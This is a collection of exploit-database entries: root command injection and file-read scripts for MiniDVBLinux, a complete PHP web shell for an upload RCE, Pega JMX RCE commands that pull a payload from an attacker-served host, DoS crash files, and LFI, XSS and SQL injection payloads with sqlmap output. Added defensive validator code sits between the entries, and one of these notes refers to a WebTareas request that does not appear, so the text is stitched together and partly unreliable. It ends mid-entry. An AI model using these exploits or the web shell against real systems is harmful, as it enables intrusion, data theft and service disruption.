MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure
# Exploit Title: MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure
# Exploit Author: LiquidWorm

MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability

Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4

Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to
convert a standard PC into a Multi Media Centre based on the Video Disk
Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital
Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and
MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives
to be as small as possible, modular, simple. It supports numerous hardware
platforms, like classic desktops in 32/64bit and also various low power ARM
systems.

Desc: The application suffers from an unauthenticated live stream disclosure
when /tpl/tv_action.sh is called and generates a snapshot in
/var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).

--------------------------------------------------------------------
/var/www/tpl/tv_action.sh:
--------------------------
#!/bin/sh

header

quality=60
svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")"
mv -f /tmp/tv.jpg /var/www/images 2>/dev/null
--------------------------------------------------------------------

Tested on: MiniDVBLinux 5.4
           BusyBox v1.25.1
           Architecture: armhf, armhf-rpi2
           GNU/Linux 4.19.127.203 (armv7l)
           VideoDiskRecorder 2.4.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5716
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php

24.09.2022

--

1. Generate screengrab:

- Request:

curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*"

- Response:

220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8
250 Grabbed image /tmp/tv.jpg 60
221 mld closing connection

2. View screengrab:

- Request:

curl http://ip:8008/images/tv.jpg

3. Or use a browser:

- http://ip:8008/home?site=remotecontrol
-
MiniDVBLinux 5.4 - Arbitrary File Read
# Exploit Title: MiniDVBLinux 5.4 - Arbitrary File Read
# Exploit Author: LiquidWorm

#!/usr/bin/env python3
#
#
# MiniDVBLinux 5.4 Arbitrary File Read Vulnerability
#
#
# Vendor: MiniDVBLinux
# Product web page: https://www.minidvblinux.de
# Affected version: <=5.4
#
# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
# way to convert a standard PC into a Multi Media Centre based on the
# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
# Linux based Digital Video Recorder: Watch TV, Timer controlled
# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
# via browser, and a lot more. MLD strives to be as small as possible,
# modular, simple. It supports numerous hardware platforms, like classic
# desktops in 32/64bit and also various low power ARM systems.
#
# Desc: The distribution suffers from an arbitrary file disclosure
# vulnerability. Using the 'file' GET parameter attackers can disclose
# arbitrary files on the affected device and disclose sensitive and system
# information.
#
# Tested on: MiniDVBLinux 5.4
#            BusyBox v1.25.1
#            Architecture: armhf, armhf-rpi2
#            GNU/Linux 4.19.127.203 (armv7l)
#            VideoDiskRecorder 2.4.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5719
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php
#
#
# 24.09.2022
#

import requests
import re,sys

#test case 001
#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT

if len(sys.argv) < 3:
    print('MiniDVBLinux 5.4 File Disclosure PoC')
    print('Usage: ./mldhd_fd.py [url] [file]')
    sys.exit(17)
else:
    url = sys.argv[1]
    fil = sys.argv[2]

req = requests.get(url+'/?site=about&name=ZSL&file='+fil)
outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()
print(outz.replace('<pre>','').replace('</pre>',''))
-
MiniDVBLinux 5.4 - Remote Root Command Injection
# Exploit Title: MiniDVBLinux 5.4 - Remote Root Command Injection
# Exploit Author: LiquidWorm

#!/usr/bin/env python3
#
#
# MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability
#
#
# Vendor: MiniDVBLinux
# Product web page: https://www.minidvblinux.de
# Affected version: <=5.4
#
# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
# way to convert a standard PC into a Multi Media Centre based on the
# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
# Linux based Digital Video Recorder: Watch TV, Timer controlled
# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
# via browser, and a lot more. MLD strives to be as small as possible,
# modular, simple. It supports numerous hardware platforms, like classic
# desktops in 32/64bit and also various low power ARM systems.
#
# Desc: The application suffers from an OS command injection vulnerability.
# This can be exploited to execute arbitrary commands with root privileges.
#
# Tested on: MiniDVBLinux 5.4
#            BusyBox v1.25.1
#            Architecture: armhf, armhf-rpi2
#            GNU/Linux 4.19.127.203 (armv7l)
#            VideoDiskRecorder 2.4.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5717
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php
#
#
# 24.09.2022
#

import requests
import re,sys

#test case 001
#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT

#test case 004
#http://ip:8008/?site=about&name=blind&file=$(id)
#cat: can't open 'uid=0(root)': No such file or directory
#cat: can't open 'gid=0(root)': No such file or directory

#test case 005
#http://ip:8008/?site=about&name=blind&file=`id`
#cat: can't open 'uid=0(root)': No such file or directory
#cat: can't open 'gid=0(root)': No such file or directory

if len(sys.argv) < 3:
    print('MiniDVBLinux 5.4 Command Injection PoC')
    print('Usage: ./mldhd_root2.py [url] [cmd]')
    sys.exit(17)
else:
    url = sys.argv[1]
    cmd = sys.argv[2]

req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')
outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()
print(outz.replace('<pre>','').replace('</pre>',''))
-
Beauty-salon v1.0 - Remote Code Execution (RCE)
## Exploit Title: Beauty-salon v1.0 - Remote Code Execution (RCE)
## Exploit Author: nu11secur1ty
## Date: 10.12.2022
## Vendor: https://code4berry.com/projects/beautysalon.php
## Software: https://code4berry.com/project%20downloads/beautysalon_download.php
## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt

## Description:
The `userimage` parameter of Beauty-salon-2022 is vulnerable to web shell file upload leading to RCE.
NOTE: The permission checks of this system do not work correctly, and the image-edit function does not sanitize its input. An attacker who holds an existing account on the system can upload a malicious file through this vulnerability (more precisely, the edit-image function performs no sanitizing) for any account, and then execute it from anywhere on the external network.

Status: HIGH Vulnerability

[+] Exploit:

```php
<!-- Project Name : PHP Web Shell -->
<!-- Version : 4.0 nu11secur1ty -->
<!-- First development date : 2022/10/05 -->
<!-- This Version development date : 2022/10/05 -->
<!-- Moded and working with PHP 8 : 2022/10/05 -->
<!-- language : html, css, javascript, php -->
<!-- Developer : nu11secur1ty -->
<!-- Web site : https://www.nu11secur1ty.com/ -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html" charset="euc-kr">
<title>PHP Web Shell Ver 4.0 by nu11secur1ty</title>
<script type="text/javascript">
function FocusIn(obj) {
    if(obj.value == obj.defaultValue) obj.value = '';
}
function FocusOut(obj) {
    if(obj.value == '') obj.value = obj.defaultValue;
}
</script>
</head>
<body>
<b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?></b><br><br>
HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br>
REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br>
<br>
<form name="cmd_exec" method="post" action="http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">
<input type="text" name="cmd" size="70" maxlength="500" value="Input command to execute" onfocus="FocusIn(document.cmd_exec.cmd)" onblur="FocusOut(document.cmd_exec.cmd)">
<input type="submit" name="exec" value="exec">
</form>
<?php
if(isset($_POST['exec'])) {
    exec($_POST['cmd'],$result);
    echo '----------------- < OutPut > -----------------';
    echo '<pre>';
    foreach($result as $print) {
        $print = str_replace('<','&lt;',$print);
        echo $print . '<br>';
    }
    echo '</pre>';
}
else echo '<br>';
?>
<form enctype="multipart/form-data" name="file_upload" method="post" action="http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">
<input type="file" name="file">
<input type="submit" name="upload" value="upload"><br>
<input type="text" name="target" size="100" value="Location where file will be uploaded (include file name!)" onfocus="FocusIn(document.file_upload.target)" onblur="FocusOut(document.file_upload.target)">
</form>
<?php
if(isset($_POST['upload'])) {
    $check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);
    if($check == TRUE) echo '<pre>The file was uploaded successfully!!</pre>';
    else echo '<pre>File Upload was failed...</pre>';
}
?>
</body>
</html>
```

# Proof and Exploit:
[href](https://streamable.com/ewdmoh)

# m0e3:
[href](https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html)

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/

hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
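Both upload advisories on this page (the WebTareas chatPhotos0 request above and the Beauty-salon userimage case) come down to the same server-side gap: the multipart Content-Type said image/png, the client file name kept its .php extension, and the file landed under a web-served directory where PHP executes. The validator below is an added example, not either project's code; the sample bodies are constructed, and the PNG/JPEG/GIF magic values are the standard file signatures.

```python
import os
import re
import secrets

# Magic bytes per allowed extension; the client's Content-Type is never consulted.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_BYTES = 5 * 1024 * 1024
# Server-side code markers that have no business inside an image upload.
CODE_MARKERS = re.compile(rb"<\?(?:php|=)|<%|<script", re.IGNORECASE)


def naive_accepts(client_content_type: str) -> bool:
    """The check both advisories defeat: trusting the multipart Content-Type alone."""
    return client_content_type.lower().startswith("image/")


def validate_image_upload(filename: str, data: bytes) -> tuple:
    """Return (accepted, detail): detail is the normalised extension or a rejection reason."""
    if len(data) > MAX_BYTES:
        return False, "too large"
    ext = os.path.splitext(os.path.basename(filename))[1].lower().lstrip(".")
    if ext == "jpeg":
        ext = "jpg"
    if ext not in MAGIC:
        return False, f"extension '{ext}' not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    if CODE_MARKERS.search(data):
        # Image metadata may legally carry text, so re-encoding the image is the
        # stronger control; this scan only catches the obvious polyglot.
        return False, "embedded server-side code"
    return True, ext


def storage_name(ext: str) -> str:
    """Random on-disk name: the client-supplied name (snupi.php) never reaches the filesystem."""
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample bodies, not the advisories' actual files.
POLYGLOT = b"\x89PNG\r\n\x1a\n" + b"PNG [...] <?php phpinfo();?> [...]"
REAL_PNG = b"\x89PNG\r\n\x1a\n" + bytes(64)

if __name__ == "__main__":
    print("naive check on image/png:", naive_accepts("image/png"))
    for name, body in (("snupi.php", POLYGLOT), ("snupi.png", POLYGLOT), ("photo.png", REAL_PNG)):
        ok, detail = validate_image_upload(name, body)
        print(name, "->", "stored as " + storage_name(detail) if ok else "rejected: " + detail)
```

Even with this validator, the upload directory (/files/Messages/ in the WebTareas response) should have script execution disabled or sit outside the document root, so a missed polyglot is served as bytes rather than run.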
-
Pega Platform 8.1.0 - Remote Code Execution (RCE)
# Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 20 Oct 2022
# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)
# Vendor Homepage: www.pega.com
# Software Link: Not Available
# Version: 8.1.0 on-premise and higher, up to 8.3.7
# Tested on: Red Hat Enterprise 7
# CVE : CVE-2022-24082

;Dumping RMI registry:
nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>

;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1:<PORT>)

;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI dump, but actually listens on the network as well):
nmap -sT -sV -p <PORT> <IP Address>

;Exploitation requires:
;- JVM
;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet)
;- jython

;Installing mbean for remote code execution
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 install random_password http://<Local IP to Serve Payload over HTTP>:6666 6666

;Execution of commands id & ifconfig
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 command random_password "id;ifconfig"

;More details:
https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316

Kind Regards,
Marcin Wolak
-
VMware Workstation 15 Pro - Denial of Service
#Title: VMware Workstation 15 Pro - Denial of Service
#Author: Milad Karimi
#Date: 2022-10-17
#Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 15 Pro (15.5.6 build-16341506)
#Affected: VMware Workstation Pro/Player 15.x

config.version = "8"
virtualHW.version = "4"
displayName = "credit's to Ex3ptionaL for find this vouln"
annotation = "Live CD ISO http://www.irongeek.com"
guestinfo.vmware.product.long = "credit's to Ex3ptionaL for find this vouln"
guestinfo.vmware.product.url = "http://www.millw0rm.com"
guestinfo.vmware.product.short = "LCDI"
guestinfo.vmware.product.version.major = "1"
guestinfo.vmware.product.version.minor = "0"
guestinfo.vmware.product.version.revision = "0"
guestinfo.vmware.product.version.type = "release"
guestinfo.vmware.product.class = "virtual machine"
guestinfo.vmware.product.build = "1.0.0rc8-20051212"
uuid.action = "create"
guestOS = "winxppro"

#####
# Memory
#####
memsize = "20000000000000"
# memsize = "300000000000000000000000000000"
# memsize = "400000000000000000000"
# memsize = "700000000000000000000000000000000000"
#
# Alternative larger memory allocations

#####
# USB
#####
usb.present = "TRUE"

#####
# Floppy
#####
floppy0.present = "FALSE"

#####
# IDE Storage
#####
ide1:0.present = "TRUE"
#Edit line below to change ISO to boot from
ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso"
ide1:0.deviceType = "cdrom-image"
ide1:0.startConnected = "TRUE"
ide1:0.autodetect = "TRUE"

#####
# Network
#####
ethernet0.present = "TRUE"
ethernet0.connectionType = "nat"
# ethernet0.connectionType = "bridged"
#
# Switch these two to enable "Bridged" vs. "NAT"

#####
# Sound
#####
sound.present = "TRUE"
sound.virtualDev = "es1371"
sound.autoDetect = "TRUE"
sound.fileName = "-1"

#####
# Misc.
#
# (normal) high
priority.grabbed = "high"
tools.syncTime = "TRUE"
workingDir = "."
#
# (16) 32 64
sched.mem.pShare.checkRate = "32"
#
# (32) 64 128
sched.mem.pshare.scanRate = "64"
#
# Higher resolution lockout, adjust values to exceed 800x600
svga.maxWidth = "8000000000000000000"
svga.maxHeight = "6000000000000000000"
#
# (F) T
isolation.tools.dnd.disable = "FALSE"
#
# (F) T
isolation.tools.hgfs.disable = "FALSE"
#
# (F) T
isolation.tools.copy.disable = "FALSE"
#
# (F) T
isolation.tools.paste.disable = "FALSE"
#
# (T) F
logging = "TRUE"
#
#
# (F) T
log.append = "FALSE"
#
# (3) number of older files kept
log.keepOld = "1"
#
# (0) microseconds
keyboard.typematicMinDelay = 100000000000000000
uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
ethernet0.addressType = "generated"
ethernet0.generatedAddress = "00:0c:29:3c:d4:4a"
ethernet0.generatedAddressOffset = "0"
checkpoint.vmState = "live-cd-iso.vmss"
tools.remindInstall = "TRUE"

Exploit code:

buffer = "A" * 118000000000000000
payload = buffer
try:
    f=open("PoC.vmx","w")
    print "[+] Creating %s evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
-
YouPHPTube<= 7.8 - Multiple Vulnerabilities
# Exploit Title: YouPHPTube <= 7.8 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-31
# Vendor Homepage: https://www.youphptube.com/
# Software Link : https://www.youphptube.com/
# Tested Version: 7.8
# Tested on: Windows 7, 10 using XAMPP

# Vulnerability Type: LFI + Path Traversal

CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22

Vulnerability description:

YouPHPTube v7.8 allows unauthenticated directory traversal and Local File Inclusion through the lang parameter in an /?lang=PATH+TRAVERSAL+FILE (without php) GET request because of an include_once in the locale/function.php page.

Proof of concept:

To detect:

http://localhost/youphptube/index.php?lang=)

An error is generated:

Warning: preg_grep(): Compilation failed: unmatched parentheses at offset 0 in C:\xampp\htdocs\YouPHPTube\locale\function.php on line 47

In the function.php page, we can see:

// filter some security here
if (!empty($_GET['lang'])) {
    $_GET['lang'] = str_replace(array("'", '"', "&quot;", "&#039;"), array('', '', '', ''), xss_esc($_GET['lang']));
}
if (empty($_SESSION['language'])) {
    $_SESSION['language'] = $config->getLanguage();
}
if (!empty($_GET['lang'])) {
    $_GET['lang'] = strip_tags($_GET['lang']);
    $_SESSION['language'] = $_GET['lang'];
}
@include_once "{$global['systemRootPath']}locale/{$_SESSION['language']}.php";

The parameter "lang" can be modified to load a php file on the server.

In the document root: /phpinfo.php with this content:

<?php echo phpinfo(); ?>

To get phpinfo.php:

http://127.0.0.1/youphptube/?lang=../../phpinfo

Note: phpinfo without ".php".

The new path is:

@include_once "{$global['systemRootPath']}locale/../../phpinfo.php";

And you can see the PHP information in the browser.

# Vulnerability Type: reflected Cross-Site Scripting (XSS)

CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:

YouPHPTube 7.8 and before does not sufficiently encode user-controlled input, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via /<YouPHPTube_path_directory>/signup?redirectUri=<XSS>, in the redirectUri parameter.

Proof of concept:

http://localhost/<YouPHPTube_path_directory>/signup?redirectUri='"()%26%25<ScRipt>alert(1)</ScRipt>
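The filter quoted in the LFI section strips quotes and tags but never touches "../", so the session language is still concatenated straight into the include path. The added example below (mine, not YouPHPTube's code) reproduces that gap on a constructed directory tree, then shows an allow-list resolver that only accepts a language token present in the locale directory; the legacy_filter function is my approximation of the quoted str_replace/strip_tags logic, and xss_esc is not modelled.

```python
import os
import re
import tempfile

# Accept only "xx" / "xx_YY" style tokens; anything with a slash or dot fails here.
LANG_TOKEN = re.compile(r"[A-Za-z]{2,3}(?:_[A-Za-z]{2})?")


def legacy_filter(lang: str) -> str:
    """Approximation of the quoted filter: drop tags and quote characters, nothing else."""
    lang = re.sub(r"<[^>]*>", "", lang)            # strip_tags
    return lang.replace("'", "").replace('"', "")   # str_replace of quote characters


def unsafe_include_path(app_root: str, lang: str) -> str:
    """Mirrors "{systemRootPath}locale/{language}.php" after the legacy filter."""
    return os.path.join(app_root, "locale", legacy_filter(lang) + ".php")


def resolve_locale(lang: str, app_root: str):
    """Allow-list resolver: token shape first, then membership in the locale directory listing."""
    if not LANG_TOKEN.fullmatch(lang):
        return None
    locale_dir = os.path.join(app_root, "locale")
    available = {f[:-4] for f in os.listdir(locale_dir) if f.endswith(".php")}
    if lang not in available:
        return None
    return os.path.join(locale_dir, lang + ".php")


def make_demo_root() -> str:
    """Constructed layout mirroring the advisory: <docroot>/phpinfo.php and
    <docroot>/youphptube/locale/en_US.php. Placeholder files, not YouPHPTube's."""
    docroot = tempfile.mkdtemp(prefix="ypt_demo_")
    os.makedirs(os.path.join(docroot, "youphptube", "locale"))
    for rel in ("phpinfo.php", os.path.join("youphptube", "locale", "en_US.php")):
        with open(os.path.join(docroot, rel), "w", encoding="utf-8") as fh:
            fh.write("<?php // placeholder\n")
    return docroot


def demo() -> dict:
    """Run the traversal value from the advisory through both paths and report each check."""
    docroot = make_demo_root()
    app = os.path.join(docroot, "youphptube")
    unsafe = unsafe_include_path(app, "../../phpinfo")
    return {
        "legacy_filter_leaves_traversal": legacy_filter("../../phpinfo") == "../../phpinfo",
        "unsafe_path_escapes_app": os.path.normpath(unsafe) == os.path.join(docroot, "phpinfo.php"),
        "unsafe_target_exists": os.path.isfile(unsafe),
        "safe_rejects_traversal": resolve_locale("../../phpinfo", app) is None,
        "safe_rejects_tags": resolve_locale("en_US<b>", app) is None,
        "safe_accepts_known": resolve_locale("en_US", app) == os.path.join(app, "locale", "en_US.php"),
        "safe_rejects_unknown": resolve_locale("fr_FR", app) is None,
    }


if __name__ == "__main__":
    for check, passed in demo().items():
        print(f"{check}: {passed}")
```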
-
SuperMailer v11.20 - Buffer overflow DoS
# Exploit Title: SuperMailer v11.20 - Buffer overflow DoS # Exploit Author: Rafael Pedrero # Discovery Date: 2021-02-07 # Vendor Homepage: https://int.supermailer.de/download_newsletter_software.htm # Software Link : https://int.supermailer.de/smintsw.zip / https://int.supermailer.de/smintsw_x64.zip # Tested Version: v11.20 32bit/64bit [11.20.0.2204] # Tested on: Windows 7, 10 CVSS v3: 3.3 CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L CWE: CWE-20 Vulnerability description: A vulnerability in Newsletter Software SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to cause a process crash resulting in a Denial of service (DoS) condition for the application on an affected system. The vulnerability exists due to insufficient validation of certain elements with a configuration file malformed. An attacker could exploit this vulnerability by sending a user a malicious SMB (configuration file) file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to cause the application to crash when trying to load the malicious file. Proof of concept: 1.- Go to File -> Save program options... 2.- Save the file (default extension *.smb) 3.- Edit file and you introduce a lot of A in somewhere. 
Example: DoS.smb file

Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

00000000  10 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41  ........©å~AAAAA
00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000020  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000030  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000040  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000050  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000060  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000070  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000080  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000090  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000000A0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000000B0  41 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00  AA—™å@..........
000000C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000E0  00 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00  ......k...S.o.f.
000000F0  74 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00  t.w.a.r.e.\.M.i.
00000100  72 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00  r.k.o. .B.o.e.e.
00000110  72 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00  r. .S.o.f.t.w.a.
00000120  72 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00  r.e.\.S.u.p.e.r.
00000130  4D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00  M.a.i.l.e.r.\.T.
00000140  65 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00  e.s.t. .E.M.a.i.
00000150  6C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00  l. .A.d.d.r.e.s.
00000160  73 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00  s.e.s...........

And save the file.

4.- Go to File -> Restore program options...
5.- The application "sm.exe" crashes.
-
Online shopping system advanced 1.0 - Multiple Vulnerabilities
# Exploit Title: Online shopping system advanced 1.0 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-09-24
# Vendor Homepage: https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software Link : https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
# Tested Version: 1.0
# Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache + php 5.X/7.X + MySQL
# Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7 vulnerabilities

# Vulnerability Type: SQL Injection - #1

CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89

Vulnerability description:

Online shopping system advanced 1.0 allows SQL injection via the admin/edit_user.php, user_id parameter.

Proof of concept:

Save this content in a file:

POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------120411781422335
Content-Length: 489
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"

25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"

otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"

puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"


-----------------------------120411781422335--

And execute SQLMAP:

>python sqlmap.py -r 1.txt --dbms=mysql -p user_id

(custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 115 HTTP(s) requests:
---
Parameter: MULTIPART user_id ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: -----------------------------120411781422335
Content-Disposition: form-data; name="user_id"

25' AND SLEEP(5) AND 'HGWF'='HGWF
-----------------------------120411781422335
Content-Disposition: form-data; name="email"

otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"

puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"


-----------------------------120411781422335--
---
[16:25:28] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12

# Vulnerability Type: SQL Injection - #2

CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89

Vulnerability description:

Online shopping system advanced 1.0 allows SQL injection via the action.php, proId parameter.

Proof of concept:

Save this content in a file:

POST http://127.0.0.1/online/action.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Host: 127.0.0.1

addToCart=1&proId=70

And execute SQLMAP:

>python sqlmap.py -r 1.txt --dbms=mysql -p proId

POST parameter 'proId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: proId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv
---
[16:03:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12

# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8
